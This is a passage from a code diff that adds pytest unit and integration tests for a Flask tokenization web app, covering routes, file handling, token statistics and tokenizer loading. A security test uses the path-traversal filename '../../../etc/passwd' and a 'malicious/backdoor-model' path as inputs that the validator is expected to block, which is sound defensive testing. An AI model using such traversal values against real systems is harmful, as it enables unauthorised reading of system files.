+ @patch('app.services.file_service.tokenizer_service')
255
+ @patch('app.services.file_service.stats_service')
256
+ def test_process_text_preview_mode(self, mock_stats, mock_tokenizer):
257
+ """Test text processing in preview mode."""
258
+ long_text = "A" * 10000 # Long text
259
+
260
+ # Mock tokenizer service
261
+ mock_tokenizer_obj = Mock()
262
+ mock_tokenizer_obj.tokenize.return_value = ['A'] * 5000 # Many tokens
263
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {}, None)
264
+
265
+ # Mock stats service
266
+ mock_stats.get_token_stats.return_value = {
267
+ 'basic_stats': {'total_tokens': 5000},
268
+ 'length_stats': {'avg_length': '1.0'}
269
+ }
270
+ mock_stats.format_tokens_for_display.return_value = []
271
+
272
+ result = self.service.process_text_for_tokenization(
273
+ text=long_text,
274
+ model_id_or_name='gpt2',
275
+ is_preview=True,
276
+ preview_char_limit=100
277
+ )
278
+
279
+ assert result['preview_only'] is True
280
+
281
+ def test_allowed_extensions_constant(self):
282
+ """Test that ALLOWED_EXTENSIONS contains expected extensions."""
283
+ extensions = self.service.ALLOWED_EXTENSIONS
284
+
285
+ assert isinstance(extensions, set)
286
+
287
+ # Check for required extensions
288
+ required_extensions = {'.txt', '.md', '.py', '.js', '.json', '.html', '.css', '.csv', '.log'}
289
+ assert required_extensions.issubset(extensions)
290
+
291
+ # All extensions should start with dot
292
+ for ext in extensions:
293
+ assert ext.startswith('.')
294
+ assert len(ext) > 1
tests/test_routes.py ADDED
@@ -0,0 +1,427 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Integration tests for Flask routes
3
+ """
4
+ import pytest
5
+ import json
6
+ import tempfile
7
+ import os
8
+ from unittest.mock import patch, Mock
9
+ from io import BytesIO
10
+ from werkzeug.datastructures import FileStorage
11
+
12
+
13
+ class TestMainRoutes:
14
+ """Integration tests for main application routes."""
15
+
16
+ def test_index_get_basic(self, client):
17
+ """Test basic GET request to index."""
18
+ response = client.get('/')
19
+
20
+ assert response.status_code == 200
21
+ assert b'Tokenizer Pro' in response.data
22
+ assert b'Advanced tokenization analysis' in response.data
23
+ assert b'textarea' in response.data
24
+
25
+ def test_index_get_with_parameters(self, client):
26
+ """Test GET request with query parameters."""
27
+ response = client.get('/?model=gpt2&model_type=predefined')
28
+
29
+ assert response.status_code == 200
30
+ assert b'gpt2' in response.data or b'GPT-2' in response.data
31
+
32
+ @patch('app.services.tokenizer_service.tokenizer_service')
33
+ @patch('app.services.file_service.file_service')
34
+ def test_index_post_text_analysis(self, mock_file_service, mock_tokenizer_service, client):
35
+ """Test POST request with text analysis."""
36
+ # Mock services
37
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
38
+
39
+ mock_file_service.process_text_for_tokenization.return_value = {
40
+ 'tokens': [
41
+ {
42
+ 'display': 'Hello',
43
+ 'original': 'Hello',
44
+ 'token_id': 15496,
45
+ 'colors': {'background': '#FF5733', 'text': '#FFFFFF'},
46
+ 'newline': False
47
+ }
48
+ ],
49
+ 'stats': {
50
+ 'basic_stats': {
51
+ 'total_tokens': 1,
52
+ 'unique_tokens': 1,
53
+ 'unique_percentage': '100.0',
54
+ 'special_tokens': 0,
55
+ 'space_tokens': 0,
56
+ 'newline_tokens': 0,
57
+ 'compression_ratio': '5.0'
58
+ },
59
+ 'length_stats': {
60
+ 'avg_length': '5.0',
61
+ 'median_length': '5.0',
62
+ 'std_dev': '0.0'
63
+ }
64
+ },
65
+ 'display_limit_reached': False,
66
+ 'total_tokens': 1,
67
+ 'preview_only': False,
68
+ 'tokenizer_info': {
69
+ 'vocab_size': 50257,
70
+ 'tokenizer_type': 'GPT2TokenizerFast'
71
+ }
72
+ }
73
+
74
+ response = client.post('/', data={
75
+ 'text': 'Hello',
76
+ 'model': 'gpt2',
77
+ 'model_type': 'predefined'
78
+ })
79
+
80
+ assert response.status_code == 200
81
+ mock_file_service.process_text_for_tokenization.assert_called_once()
82
+
83
+ @patch('app.services.tokenizer_service.tokenizer_service')
84
+ @patch('app.services.file_service.file_service')
85
+ def test_index_post_ajax_request(self, mock_file_service, mock_tokenizer_service, client):
86
+ """Test AJAX POST request for text analysis."""
87
+ # Mock services
88
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
89
+
90
+ expected_response = {
91
+ 'tokens': [],
92
+ 'stats': {'basic_stats': {}, 'length_stats': {}},
93
+ 'display_limit_reached': False,
94
+ 'total_tokens': 0
95
+ }
96
+ mock_file_service.process_text_for_tokenization.return_value = expected_response
97
+
98
+ response = client.post('/',
99
+ data={'text': 'Test', 'model': 'gpt2', 'model_type': 'predefined'},
100
+ headers={'X-Requested-With': 'XMLHttpRequest'}
101
+ )
102
+
103
+ assert response.status_code == 200
104
+ assert response.content_type == 'application/json'
105
+
106
+ data = json.loads(response.data)
107
+ assert 'tokens' in data
108
+ assert 'stats' in data
109
+
110
+ @patch('app.services.file_service.file_service')
111
+ @patch('app.services.tokenizer_service.tokenizer_service')
112
+ def test_index_post_file_upload(self, mock_tokenizer_service, mock_file_service, client, app):
113
+ """Test POST request with file upload."""
114
+ with app.app_context():
115
+ # Mock services
116
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
117
+
118
+ # Mock file processing
119
+ mock_file_service.save_uploaded_file.return_value = '/tmp/test_file.txt'
120
+ mock_file_service.process_file_for_tokenization.return_value = {
121
+ 'tokens': [],
122
+ 'stats': {'basic_stats': {}, 'length_stats': {}},
123
+ 'display_limit_reached': False,
124
+ 'total_tokens': 0,
125
+ 'preview_only': True
126
+ }
127
+ mock_file_service.cleanup_file.return_value = None
128
+
129
+ # Create test file data
130
+ file_data = BytesIO(b"Hello world! This is a test file.")
131
+
132
+ response = client.post('/',
133
+ data={
134
+ 'file': (file_data, 'test.txt'),
135
+ 'model': 'gpt2',
136
+ 'model_type': 'predefined'
137
+ },
138
+ content_type='multipart/form-data'
139
+ )
140
+
141
+ assert response.status_code == 200
142
+ mock_file_service.save_uploaded_file.assert_called_once()
143
+ mock_file_service.process_file_for_tokenization.assert_called_once()
144
+ mock_file_service.cleanup_file.assert_called_once()
145
+
146
+ @patch('app.utils.validators.validators')
147
+ def test_index_post_validation_error(self, mock_validators, client):
148
+ """Test POST request with validation error."""
149
+ from app.utils.validators import ValidationError
150
+
151
+ # Mock validation to raise error
152
+ mock_validators.validate_text_input.side_effect = ValidationError("Invalid input")
153
+
154
+ response = client.post('/',
155
+ data={'text': 'Invalid text', 'model': 'gpt2'},
156
+ headers={'X-Requested-With': 'XMLHttpRequest'}
157
+ )
158
+
159
+ assert response.status_code == 400
160
+ data = json.loads(response.data)
161
+ assert 'error' in data
162
+ assert 'Invalid input' in data['error']
163
+
164
+ def test_index_post_empty_data(self, client):
165
+ """Test POST request with empty data."""
166
+ response = client.post('/', data={})
167
+
168
+ assert response.status_code == 200
169
+ # Should return the form again without processing
170
+
171
+
172
+ class TestTokenizerInfoRoute:
173
+ """Integration tests for tokenizer info route."""
174
+
175
+ @patch('app.services.tokenizer_service.tokenizer_service')
176
+ def test_tokenizer_info_predefined_model(self, mock_tokenizer_service, client):
177
+ """Test tokenizer info for predefined model."""
178
+ # Mock service
179
+ mock_tokenizer_service.is_predefined_model.return_value = True
180
+ mock_tokenizer_service.load_tokenizer.return_value = (
181
+ Mock(),
182
+ {
183
+ 'vocab_size': 50257,
184
+ 'tokenizer_type': 'GPT2TokenizerFast',
185
+ 'model_max_length': 1024,
186
+ 'special_tokens': {'eos_token': '</s>'}
187
+ },
188
+ None
189
+ )
190
+
191
+ response = client.get('/tokenizer-info?model_id=gpt2&is_custom=false')
192
+
193
+ assert response.status_code == 200
194
+ assert response.content_type == 'application/json'
195
+
196
+ data = json.loads(response.data)
197
+ assert 'vocab_size' in data
198
+ assert 'tokenizer_type' in data
199
+ assert data['vocab_size'] == 50257
200
+
201
+ @patch('app.services.tokenizer_service.tokenizer_service')
202
+ @patch('app.utils.validators.validators')
203
+ def test_tokenizer_info_custom_model(self, mock_validators, mock_tokenizer_service, client):
204
+ """Test tokenizer info for custom model."""
205
+ # Mock validation
206
+ mock_validators.validate_model_path.return_value = None
207
+
208
+ # Mock service
209
+ mock_tokenizer_service.is_predefined_model.return_value = False
210
+ mock_tokenizer_service.load_tokenizer.return_value = (
211
+ Mock(),
212
+ {
213
+ 'vocab_size': 32000,
214
+ 'tokenizer_type': 'LlamaTokenizerFast',
215
+ 'special_tokens': {}
216
+ },
217
+ None
218
+ )
219
+
220
+ response = client.get('/tokenizer-info?model_id=meta-llama/Llama-2-7b-hf&is_custom=true')
221
+
222
+ assert response.status_code == 200
223
+ data = json.loads(response.data)
224
+ assert data['vocab_size'] == 32000
225
+
226
+ def test_tokenizer_info_missing_model_id(self, client):
227
+ """Test tokenizer info without model_id."""
228
+ response = client.get('/tokenizer-info')
229
+
230
+ assert response.status_code == 400
231
+ data = json.loads(response.data)
232
+ assert 'error' in data
233
+ assert 'No model ID provided' in data['error']
234
+
235
+ @patch('app.utils.validators.validators')
236
+ def test_tokenizer_info_validation_error(self, mock_validators, client):
237
+ """Test tokenizer info with validation error."""
238
+ from app.utils.validators import ValidationError
239
+
240
+ # Mock validation to raise error
241
+ mock_validators.validate_model_path.side_effect = ValidationError("Invalid model path")
242
+
243
+ response = client.get('/tokenizer-info?model_id=invalid/path&is_custom=true')
244
+
245
+ assert response.status_code == 400
246
+ data = json.loads(response.data)
247
+ assert 'error' in data
248
+ assert 'Invalid model path' in data['error']
249
+
250
+ @patch('app.services.tokenizer_service.tokenizer_service')
251
+ def test_tokenizer_info_service_error(self, mock_tokenizer_service, client):
252
+ """Test tokenizer info with service error."""
253
+ # Mock service to return error
254
+ mock_tokenizer_service.is_predefined_model.return_value = True
255
+ mock_tokenizer_service.load_tokenizer.return_value = (None, {}, "Failed to load tokenizer")
256
+
257
+ response = client.get('/tokenizer-info?model_id=gpt2&is_custom=false')
258
+
259
+ assert response.status_code == 400
260
+ data = json.loads(response.data)
261
+ assert 'error' in data
262
+ assert 'Failed to load tokenizer' in data['error']
263
+
264
+
265
+ class TestHealthCheckRoutes:
266
+ """Integration tests for health check routes."""
267
+
268
+ def test_basic_health_check(self, client):
269
+ """Test basic health check endpoint."""
270
+ response = client.get('/health')
271
+
272
+ assert response.status_code == 200
273
+ assert response.content_type == 'application/json'
274
+
275
+ data = json.loads(response.data)
276
+ assert 'status' in data
277
+ assert 'timestamp' in data
278
+ assert 'version' in data
279
+ assert data['status'] == 'healthy'
280
+
281
+ @patch('app.services.tokenizer_service.tokenizer_service')
282
+ @patch('psutil.cpu_percent')
283
+ @patch('psutil.virtual_memory')
284
+ @patch('psutil.disk_usage')
285
+ def test_detailed_health_check(self, mock_disk, mock_memory, mock_cpu, mock_tokenizer_service, client):
286
+ """Test detailed health check endpoint."""
287
+ # Mock system info
288
+ mock_cpu.return_value = 25.5
289
+ mock_memory.return_value = Mock(total=8000000000, available=4000000000, percent=50.0, used=4000000000)
290
+ mock_disk.return_value = Mock(total=100000000000, used=50000000000, free=50000000000)
291
+
292
+ # Mock tokenizer service
293
+ mock_tokenizer_service.tokenizers = {}
294
+ mock_tokenizer_service.custom_tokenizers = {}
295
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {}}
296
+ mock_tokenizer_service.load_tokenizer.return_value = (Mock(), {}, None)
297
+
298
+ response = client.get('/health/detailed')
299
+
300
+ assert response.status_code == 200
301
+ data = json.loads(response.data)
302
+
303
+ assert 'status' in data
304
+ assert 'system' in data
305
+ assert 'services' in data
306
+ assert 'configuration' in data
307
+
308
+ # Check system info
309
+ assert 'cpu_percent' in data['system']
310
+ assert 'memory' in data['system']
311
+ assert 'disk' in data['system']
312
+
313
+ # Check services info
314
+ assert 'tokenizer_service' in data['services']
315
+ assert 'file_service' in data['services']
316
+
317
+ @patch('app.services.tokenizer_service.tokenizer_service')
318
+ def test_readiness_check_ready(self, mock_tokenizer_service, client, app):
319
+ """Test readiness check when application is ready."""
320
+ with app.app_context():
321
+ # Mock successful tokenizer loading
322
+ mock_tokenizer_service.load_tokenizer.return_value = (Mock(), {}, None)
323
+
324
+ response = client.get('/health/ready')
325
+
326
+ assert response.status_code == 200
327
+ data = json.loads(response.data)
328
+
329
+ assert 'ready' in data
330
+ assert 'checks' in data
331
+ assert isinstance(data['checks'], dict)
332
+
333
+ @patch('app.services.tokenizer_service.tokenizer_service')
334
+ def test_readiness_check_not_ready(self, mock_tokenizer_service, client):
335
+ """Test readiness check when application is not ready."""
336
+ # Mock failed tokenizer loading
337
+ mock_tokenizer_service.load_tokenizer.return_value = (None, {}, "Failed to load")
338
+
339
+ response = client.get('/health/ready')
340
+
341
+ assert response.status_code == 503
342
+ data = json.loads(response.data)
343
+
344
+ assert data['ready'] is False
345
+ assert 'checks' in data
346
+
347
+
348
+ class TestErrorHandling:
349
+ """Test error handling across routes."""
350
+
351
+ def test_404_handling(self, client):
352
+ """Test 404 error handling."""
353
+ response = client.get('/nonexistent-route')
354
+ assert response.status_code == 404
355
+
356
+ def test_405_method_not_allowed(self, client):
357
+ """Test 405 error for wrong HTTP method."""
358
+ response = client.put('/') # PUT not allowed
359
+ assert response.status_code == 405
360
+
361
+ @patch('app.services.tokenizer_service.tokenizer_service')
362
+ def test_500_internal_error(self, mock_tokenizer_service, client):
363
+ """Test 500 error handling."""
364
+ # Mock service to raise unexpected exception
365
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
366
+
367
+ with patch('app.services.file_service.file_service') as mock_file_service:
368
+ mock_file_service.process_text_for_tokenization.side_effect = Exception("Unexpected error")
369
+
370
+ response = client.post('/',
371
+ data={'text': 'Test', 'model': 'gpt2', 'model_type': 'predefined'},
372
+ headers={'X-Requested-With': 'XMLHttpRequest'}
373
+ )
374
+
375
+ assert response.status_code == 400 # Our app returns 400 for processing errors
376
+ data = json.loads(response.data)
377
+ assert 'error' in data
378
+
379
+
380
+ class TestSecurityFeatures:
381
+ """Test security features in routes."""
382
+
383
+ @patch('app.utils.validators.validators')
384
+ def test_malicious_filename_blocked(self, mock_validators, client):
385
+ """Test that malicious filenames are blocked."""
386
+ from app.utils.validators import ValidationError
387
+
388
+ # Mock validation to detect malicious filename
389
+ mock_validators.validate_filename.side_effect = ValidationError("Malicious filename detected")
390
+
391
+ file_data = BytesIO(b"test content")
392
+
393
+ response = client.post('/',
394
+ data={
395
+ 'file': (file_data, '../../../etc/passwd'),
396
+ 'model': 'gpt2',
397
+ 'model_type': 'predefined'
398
+ },
399
+ content_type='multipart/form-data',
400
+ headers={'X-Requested-With': 'XMLHttpRequest'}
401
+ )
402
+
403
+ assert response.status_code == 400
404
+ data = json.loads(response.data)
405
+ assert 'error' in data
406
+
407
+ @patch('app.utils.validators.validators')
408
+ def test_malicious_model_path_blocked(self, mock_validators, client):
409
+ """Test that malicious model paths are blocked."""
410
+ from app.utils.validators import ValidationError
411
+
412
+ # Mock validation to detect malicious model path
413
+ mock_validators.validate_model_path.side_effect = ValidationError("Untrusted model path")
414
+
415
+ response = client.post('/',
416
+ data={
417
+ 'text': 'Test',
418
+ 'custom_model': 'malicious/backdoor-model',
419
+ 'model_type': 'custom'
420
+ },
421
+ headers={'X-Requested-With': 'XMLHttpRequest'}
422
+ )
423
+
424
+ assert response.status_code == 400
425
+ data = json.loads(response.data)
426
+ assert 'error' in data
427
+ assert 'Untrusted model path' in data['error']
tests/test_stats_service.py ADDED
@@ -0,0 +1,250 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for StatsService
3
+ """
4
+ import pytest
5
+ from unittest.mock import Mock
6
+ from app.services.stats_service import StatsService
7
+
8
+
9
+ class TestStatsService:
10
+ """Test cases for StatsService."""
11
+
12
+ def setup_method(self):
13
+ """Set up test fixtures."""
14
+ self.service = StatsService()
15
+
16
+ def test_get_varied_color_basic(self):
17
+ """Test basic color generation."""
18
+ color = self.service.get_varied_color(0, 10)
19
+
20
+ assert isinstance(color, dict)
21
+ assert 'background' in color
22
+ assert 'text' in color
23
+ assert color['background'].startswith('#')
24
+ assert color['text'].startswith('#')
25
+ assert len(color['background']) == 7 # #RRGGBB format
26
+ assert len(color['text']) == 7
27
+
28
+ def test_get_varied_color_different_indices(self):
29
+ """Test that different indices produce different colors."""
30
+ color1 = self.service.get_varied_color(0, 10)
31
+ color2 = self.service.get_varied_color(1, 10)
32
+ color3 = self.service.get_varied_color(5, 10)
33
+
34
+ # Colors should be different
35
+ assert color1['background'] != color2['background']
36
+ assert color2['background'] != color3['background']
37
+ assert color1['background'] != color3['background']
38
+
39
+ def test_get_varied_color_edge_cases(self):
40
+ """Test color generation with edge cases."""
41
+ # Single token
42
+ color = self.service.get_varied_color(0, 1)
43
+ assert isinstance(color, dict)
44
+
45
+ # Large number of tokens
46
+ color = self.service.get_varied_color(999, 1000)
47
+ assert isinstance(color, dict)
48
+
49
+ # Zero index
50
+ color = self.service.get_varied_color(0, 5)
51
+ assert isinstance(color, dict)
52
+
53
+ def test_fix_token_basic(self):
54
+ """Test basic token fixing."""
55
+ assert self.service.fix_token("hello") == "hello"
56
+ assert self.service.fix_token("world") == "world"
57
+
58
+ def test_fix_token_special_characters(self):
59
+ """Test token fixing with special characters."""
60
+ # Test space replacement
61
+ assert self.service.fix_token(" ") == "␣"
62
+ assert self.service.fix_token("\t") == "→"
63
+ assert self.service.fix_token("\n") == "↵"
64
+
65
+ # Test Ġ prefix (common in tokenizers)
66
+ assert self.service.fix_token("Ġhello") == " hello"
67
+ assert self.service.fix_token("Ġworld") == " world"
68
+
69
+ # Test combination
70
+ assert self.service.fix_token("Ġ") == " "
71
+
72
+ def test_fix_token_edge_cases(self):
73
+ """Test token fixing edge cases."""
74
+ # Empty string
75
+ assert self.service.fix_token("") == ""
76
+
77
+ # None (shouldn't happen but test defensive programming)
78
+ result = self.service.fix_token(None)
79
+ assert result is None or result == ""
80
+
81
+ # Multiple special characters
82
+ assert self.service.fix_token("\n\t ") == "↵→␣"
83
+
84
+ # Multiple Ġ prefixes (edge case)
85
+ assert self.service.fix_token("ĠĠhello") == " hello"
86
+
87
+ def test_get_token_stats_basic(self, sample_tokens, sample_text):
88
+ """Test basic token statistics calculation."""
89
+ stats = self.service.get_token_stats(sample_tokens, sample_text)
90
+
91
+ assert isinstance(stats, dict)
92
+ assert 'basic_stats' in stats
93
+ assert 'length_stats' in stats
94
+
95
+ basic = stats['basic_stats']
96
+ length = stats['length_stats']
97
+
98
+ # Check basic stats structure
99
+ assert 'total_tokens' in basic
100
+ assert 'unique_tokens' in basic
101
+ assert 'unique_percentage' in basic
102
+ assert 'special_tokens' in basic
103
+ assert 'space_tokens' in basic
104
+ assert 'newline_tokens' in basic
105
+ assert 'compression_ratio' in basic
106
+
107
+ # Check length stats structure
108
+ assert 'avg_length' in length
109
+ assert 'median_length' in length
110
+ assert 'std_dev' in length
111
+
112
+ def test_get_token_stats_calculations(self):
113
+ """Test specific statistics calculations."""
114
+ tokens = ['Hello', ' world', '!', ' test']
115
+ text = "Hello world! test"
116
+
117
+ stats = self.service.get_token_stats(tokens, text)
118
+ basic = stats['basic_stats']
119
+
120
+ # Test total tokens
121
+ assert basic['total_tokens'] == 4
122
+
123
+ # Test unique tokens (all are unique in this case)
124
+ assert basic['unique_tokens'] == 4
125
+ assert basic['unique_percentage'] == "100.0"
126
+
127
+ # Test compression ratio
128
+ expected_ratio = len(text) / len(tokens)
129
+ assert float(basic['compression_ratio']) == pytest.approx(expected_ratio, rel=1e-2)
130
+
131
+ def test_get_token_stats_special_tokens(self):
132
+ """Test special token counting."""
133
+ tokens = ['<s>', 'Hello', ' world', '</s>', '<pad>']
134
+ text = "Hello world"
135
+
136
+ stats = self.service.get_token_stats(tokens, text)
137
+ basic = stats['basic_stats']
138
+
139
+ # Should detect special tokens (those with < >)
140
+ assert basic['special_tokens'] >= 2 # <s>, </s>, <pad>
141
+
142
+ def test_get_token_stats_whitespace_tokens(self):
143
+ """Test whitespace token counting."""
144
+ tokens = ['Hello', ' ', 'world', '\n', 'test', '\t']
145
+ text = "Hello world\ntest\t"
146
+
147
+ stats = self.service.get_token_stats(tokens, text)
148
+ basic = stats['basic_stats']
149
+
150
+ # Should count space and tab tokens
151
+ assert basic['space_tokens'] >= 1
152
+ assert basic['newline_tokens'] >= 1
153
+
154
+ def test_get_token_stats_length_calculations(self):
155
+ """Test token length statistics."""
156
+ tokens = ['a', 'bb', 'ccc', 'dddd'] # Lengths: 1, 2, 3, 4
157
+ text = "a bb ccc dddd"
158
+
159
+ stats = self.service.get_token_stats(tokens, text)
160
+ length = stats['length_stats']
161
+
162
+ # Average length should be 2.5
163
+ assert float(length['avg_length']) == pytest.approx(2.5, rel=1e-2)
164
+
165
+ # Median should be 2.5 (between 2 and 3)
166
+ assert float(length['median_length']) == pytest.approx(2.5, rel=1e-2)
167
+
168
+ def test_get_token_stats_empty_input(self):
169
+ """Test statistics with empty input."""
170
+ stats = self.service.get_token_stats([], "")
171
+
172
+ basic = stats['basic_stats']
173
+ length = stats['length_stats']
174
+
175
+ assert basic['total_tokens'] == 0
176
+ assert basic['unique_tokens'] == 0
177
+ assert basic['unique_percentage'] == "0.0"
178
+ assert basic['compression_ratio'] == "0.0"
179
+
180
+ # Length stats should handle empty case gracefully
181
+ assert length['avg_length'] == "0.0"
182
+ assert length['median_length'] == "0.0"
183
+ assert length['std_dev'] == "0.0"
184
+
185
+ def test_format_tokens_for_display_basic(self, mock_tokenizer):
186
+ """Test basic token formatting for display."""
187
+ tokens = ['Hello', ' world', '!']
188
+
189
+ # Mock the tokenizer.convert_ids_to_tokens method
190
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
191
+
192
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
193
+
194
+ assert isinstance(formatted, list)
195
+ assert len(formatted) == len(tokens)
196
+
197
+ for i, token_data in enumerate(formatted):
198
+ assert isinstance(token_data, dict)
199
+ assert 'display' in token_data
200
+ assert 'original' in token_data
201
+ assert 'token_id' in token_data
202
+ assert 'colors' in token_data
203
+ assert 'newline' in token_data
204
+
205
+ assert token_data['original'] == tokens[i]
206
+ assert isinstance(token_data['colors'], dict)
207
+ assert 'background' in token_data['colors']
208
+ assert 'text' in token_data['colors']
209
+
210
+ def test_format_tokens_newline_detection(self, mock_tokenizer):
211
+ """Test newline detection in token formatting."""
212
+ tokens = ['Hello', '\n', 'world']
213
+
214
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
215
+
216
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
217
+
218
+ # Second token should be marked as newline
219
+ assert formatted[1]['newline'] is True
220
+ assert formatted[0]['newline'] is False
221
+ assert formatted[2]['newline'] is False
222
+
223
+ def test_format_tokens_color_consistency(self, mock_tokenizer):
224
+ """Test that same tokens get same colors."""
225
+ tokens = ['hello', 'world', 'hello'] # 'hello' appears twice
226
+
227
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
228
+
229
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
230
+
231
+ # Same tokens should have same colors
232
+ assert formatted[0]['colors']['background'] == formatted[2]['colors']['background']
233
+ assert formatted[0]['colors']['text'] == formatted[2]['colors']['text']
234
+
235
+ # Different tokens should have different colors
236
+ assert formatted[0]['colors']['background'] != formatted[1]['colors']['background']
237
+
238
+ def test_format_tokens_special_character_handling(self, mock_tokenizer):
239
+ """Test special character handling in token formatting."""
240
+ tokens = [' ', '\t', '\n', 'Ġhello']
241
+
242
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
243
+
244
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
245
+
246
+ # Check that special characters are properly converted
247
+ assert formatted[0]['display'] == '␣' # Space
248
+ assert formatted[1]['display'] == '→' # Tab
249
+ assert formatted[2]['display'] == '↵' # Newline
250
+ assert formatted[3]['display'] == ' hello' # Ġ prefix
tests/test_tokenizer_service.py ADDED
@@ -0,0 +1,185 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for TokenizerService
3
+ """
4
+ import pytest
5
+ from unittest.mock import Mock, patch, MagicMock
6
+ from app.services.tokenizer_service import TokenizerService
7
+ import time
8
+
9
+
10
+ class TestTokenizerService:
11
+ """Test cases for TokenizerService."""
12
+
13
+ def setup_method(self):
14
+ """Set up test fixtures."""
15
+ self.service = TokenizerService()
16
+
17
+ def test_is_predefined_model(self):
18
+ """Test predefined model checking."""
19
+ # Test with existing model
20
+ assert self.service.is_predefined_model('gpt2') is True
21
+
22
+ # Test with non-existing model
23
+ assert self.service.is_predefined_model('nonexistent-model') is False
24
+
25
+ # Test with empty string
26
+ assert self.service.is_predefined_model('') is False
27
+
28
+ def test_get_tokenizer_info_basic(self, mock_tokenizer):
29
+ """Test basic tokenizer info extraction."""
30
+ info = self.service.get_tokenizer_info(mock_tokenizer)
31
+
32
+ assert 'vocab_size' in info
33
+ assert 'tokenizer_type' in info
34
+ assert 'special_tokens' in info
35
+ assert info['vocab_size'] == 50257
36
+ assert info['tokenizer_type'] == 'MockTokenizer'
37
+
38
+ # Check special tokens
39
+ special_tokens = info['special_tokens']
40
+ assert 'pad_token' in special_tokens
41
+ assert 'eos_token' in special_tokens
42
+ assert special_tokens['pad_token'] == '<pad>'
43
+ assert special_tokens['eos_token'] == '</s>'
44
+
45
+ def test_get_tokenizer_info_with_max_length(self, mock_tokenizer):
46
+ """Test tokenizer info with model_max_length."""
47
+ mock_tokenizer.model_max_length = 2048
48
+
49
+ info = self.service.get_tokenizer_info(mock_tokenizer)
50
+
51
+ assert 'model_max_length' in info
52
+ assert info['model_max_length'] == 2048
53
+
54
+ def test_get_tokenizer_info_error_handling(self):
55
+ """Test error handling in tokenizer info extraction."""
56
+ # Create a mock that raises an exception
57
+ broken_tokenizer = Mock()
58
+ broken_tokenizer.__class__.__name__ = 'BrokenTokenizer'
59
+ broken_tokenizer.vocab_size = property(Mock(side_effect=Exception("Test error")))
60
+
61
+ info = self.service.get_tokenizer_info(broken_tokenizer)
62
+
63
+ assert 'error' in info
64
+ assert 'Test error' in info['error']
65
+
66
+ @patch('app.services.tokenizer_service.AutoTokenizer')
67
